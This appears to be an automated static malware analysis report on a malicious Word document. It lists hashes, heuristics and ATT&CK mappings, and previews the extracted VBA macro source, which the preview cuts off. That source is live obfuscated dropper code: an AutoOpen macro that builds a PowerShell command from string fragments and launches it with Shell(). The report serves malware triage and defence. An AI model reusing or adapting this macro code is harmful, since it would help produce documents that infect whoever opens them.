Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 36c48656d3e758b7…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 119.0 KB
Created: 2018-05-23 09:55:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 9d160deb9c4147cf99c29a13e283573e
SHA-1: 6935324f84ddfcf5c822920114da0727fc17ddbe
SHA-256: 36c48656d3e758b7c92e32b1be0c0afc8c8a23a92fbe331ac31c19b8d22ac319
Risk score: 204

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File)

The sample is a malicious Office document containing VBA macros. The AutoOpen macro causes the VBA code to run as soon as the document is opened, and the Shell() call gives it the ability to launch an external process. The script attempts to assemble an obfuscated PowerShell command from string fragments and execute it, most likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6575979-0' further supports its role as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6575979-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6575979-0
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    The VBA code calls Shell(), which can launch an external process
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro, which runs automatically when the document is opened
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 122983 bytes
SHA-256: 44f9baa3d87c523597a84d544fe6e4632d7c0a836591e84bcb551d730cec155d
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "tcAASwAJtUZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function Gjiqt()

On Error Resume Next
EsdZdza = GrAjE + CSng(374598) + 584987 / Sin(928121 - CByte(715123) / 823428 - Round(374598)) + twWdWF * jHaucfK - (584987 + 928121 + 715123 - 3745980)
Set UulQbNi = wpfVjkKw
JRtOnowz = "xVhgZ0UQKq4BkacqGbI5lDbowershell & ( $pF2qcPTCtuZVomTgCjshfvygHQQe[4]ZCm"
QEvpwKblmG = Left(Right(JRtOnowz, 49), 16) + CStr(Left(Right(JRtOnowz, 16), 2)) + Left(Right(JRtOnowz, 22), 2) + CStr(Left(Right(JRtOnowz, 7), 4))

kCYiwIljz = Chr(43)
jdAZVRsDJ = "aM4SgO6]Q6J9sYKRvK$PshoME[3D0mCBz"
QftSCVjccs = Left(Right(jdAZVRsDJ, 15), 8) + CStr(Left(Right(jdAZVRsDJ, 7), 1)) + CStr(Left(Right(jdAZVRsDJ, 5), 1)) + CStr(Left(Right(jdAZVRsDJ, 26), 1))

vTLRLLiKrUd = Chr(43)
jrNfPEoLf = "4SgO6JQ6J9sYKRvKXnKCHsMPrDwmCBzhIQeEgbZpgX9JnHzRJPMmtO4'x') (nEw-ObJecT sySTem.Io.TmconuLTBUfgS2d19"
JHDWY = Left(Right(jrNfPEoLf, 44), 23) + CStr(Left(Right(jrNfPEoLf, 21), 4)) + CStr(Left(Right(jrNfPEoLf, 15), 2)) + CStr(Left(Right(jrNfPEoLf, 77), 3)) + CStr(Left(Right(jrNfPEoLf, 64), 1))

hBpHu = "4SgO6JQ6J9sYKRvKXnKCHso.MDwmCBzhIQeegbZpgX9JnHzRJPMmtO4sSion.DeFlaTEStREAM([SysTEmTm.inuLTBUfgS2d19"
NbDkt = Left(Right(hBpHu, 44), 23) + CStr(Left(Right(hBpHu, 21), 4)) + CStr(Left(Right(hBpHu, 15), 2)) + CStr(Left(Right(hBpHu, 77), 3)) + CStr(Left(Right(hBpHu, 64), 1))

wjJChZZNB = "4SgO6JQ6J9sYKRvonnKCHsjUVDwmCBzhIQeugbmorystreAm][sYSt4Em.wCMdu79BFtn"
ZBWwp = CStr(Left(Right(wjJChZZNB, 31), 16)) + Left(Right(wjJChZZNB, 14), 3) + CStr(Left(Right(wjJChZZNB, 10), 1)) + CStr(Left(Right(wjJChZZNB, 54), 2)) + CStr(Left(Right(wjJChZZNB, 45), 1))
wKbPRqLZKsJ = mVwKUrWSUJ + CSng(265241) + 741278 / Sin(790410 - CByte(674125) / 260587 - Round(265241)) + PQYhiV * wRLzqi - (741278 + 790410 + 674125 - 2652410)
Set uwvdJCTaH = AINSiNs
VYKuvdafi = "4SgO6JQ6J9sYKRvKXnKCHsjUs5EmCBzhIQeugbP5gX9JnHzRJPMmtO4BjCwsert]::FRombaSE64sTRInG( 'DXVZtBTxgS2d19b15dIlQXO"
LOZUPwr = Left(Right(VYKuvdafi, 48), 25) + Left(Right(VYKuvdafi, 22), 4) + CStr(Left(Right(VYKuvdafi, 17), 2)) + CStr(Left(Right(VYKuvdafi, 84), 3)) + Left(Right(VYKuvdafi, 70), 2)

TCoksiwPw = Chr(43)
mvziww = "aM4SgO6Js6J9sYKRvKXnK0v2HVXW67CIpkIQeug"
mIwXU = CStr(Left(Right(mvziww, 18), 9)) + CStr(Left(Right(mvziww, 8), 2)) + Left(Right(mvziww, 6), 1) + CStr(Left(Right(mvziww, 31), 1))

hPSoXWFQmR = Chr(43)
WVUKGV = "aM4SgO6JQLJ9sYKRvKXnKCH8vRZVKAychUdQpugbZp"
uiuSa = CStr(Left(Right(WVUKGV, 19), 10)) + Left(Right(WVUKGV, 9), 2) + Left(Right(WVUKGV, 6), 1) + Left(Right(WVUKGV, 33), 1)

SDvfa = Chr(43)
oGCCvi = "4SgO6JQ6J9sYKRvKXnmeHsjUSDwmC3zhIQeugbZpgX9JnoYQH8LiQGjYpMlSGnL57/ctn8twEVVjjPgBE"
bbJfD = Left(Right(oGCCvi, 36), 19) + CStr(Left(Right(oGCCvi, 17), 3)) + CStr(Left(Right(oGCCvi, 12), 2)) + Left(Right(oGCCvi, 63), 2) + Left(Right(oGCCvi, 52), 1)

qnGMhO = "aM4SgO6JQ6H9sYKRvKXnKCHsjAmXxeGyP7ZlnngrZpgX9"
nYntmm = CStr(Left(Right(qnGMhO, 20), 11)) + CStr(Left(Right(qnGMhO, 9), 2)) + Left(Right(qnGMhO, 6), 1) + Left(Right(qnGMhO, 35), 1)

OWXHkq = "4SgO6JQ6J9sYKRvKXnKCHsGNqDwmCBzhIQeogbZpgX9JnHzRJPMmtO4juu6rXZzsd1mAb78LIzTxfhdBTvTme7nuLTBUfgS2d19"
dCJzw = Left(Right(OWXHkq, 44), 23) + CStr(Left(Right(OWXHkq, 21), 4)) + CStr(Left(Right(OWXHkq, 15), 2)) + CStr(Left(Right(OWXHkq, 77), 3)) + CStr(Left(Right(OWXHkq, 64), 1))

RdKzEz = "JtE2Oa"
zbdCkBkL = CStr(Left(Right(RdKzEz, 3), 2))
zCJGwIc = zZYdSwlvT + CSng(485823) + 136879 / Sin(139801 - CByte(178420) / 844195 - Round(485823)) + ffqlqvG * RwjMBstSOzU - (136879 + 139801 + 178420 - 4858230)
Set aziiun = MjHNzzjMcb
XjvvuAz = Chr(43)
zPrcWhOH = "JtEjuSElM"
iGwAiPSU = Left(Right(zPrcWhOH, 4), 3)

QpwIiUIlTij = Chr(43)
sIsXhHiKv = "aM4SgO61Q6J9sYKRvK430GMcszCDDmCBz"
OiwoIdXSMf = Left(Right(sIsXhHiKv, 15), 8) + CStr(Left(Right(sIsXhHiKv, 7), 1)) + CStr(Left(Right(sIsXhHiKv, 5), 1)) + CStr(Left(Right(sIsXhHiKv,
... (truncated)